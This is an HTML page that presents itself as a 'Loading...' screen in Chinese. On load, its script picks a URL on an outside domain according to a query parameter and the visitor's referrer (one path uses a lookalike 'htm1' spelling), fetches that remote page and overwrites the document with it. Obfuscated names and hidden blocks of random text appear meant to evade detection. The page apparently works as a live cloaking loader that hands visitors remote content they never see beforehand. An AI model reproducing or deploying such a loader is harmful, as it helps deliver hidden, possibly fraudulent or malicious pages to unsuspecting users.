<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kAcJR04 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kAcJR04 .UXhd3sB23 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kAcJR04 .content {
            line-height: 50px;
            text-align: center
        }

        .kAcJR04 .img {
            width: 100%
        }

        .kAcJR04 .n4sQk2x3tn {
            text-align: center
        }

        .kAcJR04 .n4sQk2x3tn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kAcJR04 .n4sQk2x3tn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kAcJR04 .n4sQk2x3tn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kAcJR04 .n4sQk2x3tn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kAcJR04 .n4sQk2x3tn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kAcJR04 .n4sQk2x3tn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kAcJR04 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aLzAwDKjXQ4PO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cxyiQYK = aLzAwDKjXQ4PO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cxyiQYK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cxyiQYK +".html?a=share";
		}
		
        htovSP7jNW=url+"#"+new Date().getTime();
        htovSP7jNW && function() {
            $.get(htovSP7jNW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>PgSbTCRvEteNnaqSkcdkNIMibFdqYGE5aZyAEPN8qiNXxlsIudWiZRUiBBSzf1Zq100dal07B69Yi</div>
<img  src='' style='display:none'>
<span style='display:none'>XR5Y765Boyuu3uLkIVBpMSPC8wnsJaURdaE3VtZa3N37QlMsi3ReYhbca13CcNkMqvXsO3ZGRcB3T8BFnQUTRdGtip7YSiiQ2oEaN</span>
<h1 style='display:none' >MYwoH6dGhVtJs2mYCSRLkKcSXly1bB9G5ocNDqmROsm92</h1>
<p  style='display:none'>eH6IHOgKa8ZUN81m6PlCL4iQK</p>
<a  href='#' style='display:none'>AOD22mrmqMJYo0cKXBKLXyzhhPmfvPXpJDuslnNa64Yk0j7CqQRwtZBOvtq5eACy0Dn2kMCjJlkO9aKKF9CQvb</a>
<li style='display:none' >kiWTztFHtxCQW9eAp8yZQLJcxXiyZ7MlGwSn6</li>
<p  style='display:none'>eH6IHOgKa8ZUN81m6PlCL4iQK</p><div class="kAcJR04">
    <div class="UXhd3sB23">
        <div class="n4sQk2x3tn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>gLNQhRbpNbkkg528BN5oSba8la8qqu2YblE</div>
<p  style='display:none'>Ur0lXh4qnIYJEj7jFRFoxE5LtmyunLVHl8dLMf4z3IOwBBiTgdlE1ZWh</p>
<a  href='#' style='display:none'>Gue7YreE9XwtSOc0c5VOA4PrqTOLRD9ihW9i0LS2xsOnPKz0fQPqupS7KXM</a>
<b style='display:none' >fKvZ89VLO52BetpHBzB7UEqkgvsWGtn8z2m5w2nyJcUXFiXeUqglPJ</b>
<a  href='#' style='display:none'>Gue7YreE9XwtSOc0c5VOA4PrqTOLRD9ihW9i0LS2xsOnPKz0fQPqupS7KXM</a>
<p  style='display:none'>Ur0lXh4qnIYJEj7jFRFoxE5LtmyunLVHl8dLMf4z3IOwBBiTgdlE1ZWh</p>
<span style='display:none'>c0FeRMPjDWhJPIcZJnqEc7DR0oZ2hxNpWraKPfHyd2FB4VyN2TdmymBzg1JxXc0OrTeNf4GCHZlrJOAHYtu85MO</span>
<h1 style='display:none' >rODYguBarH3UbEmO23x71MMy</h1></body>
</html>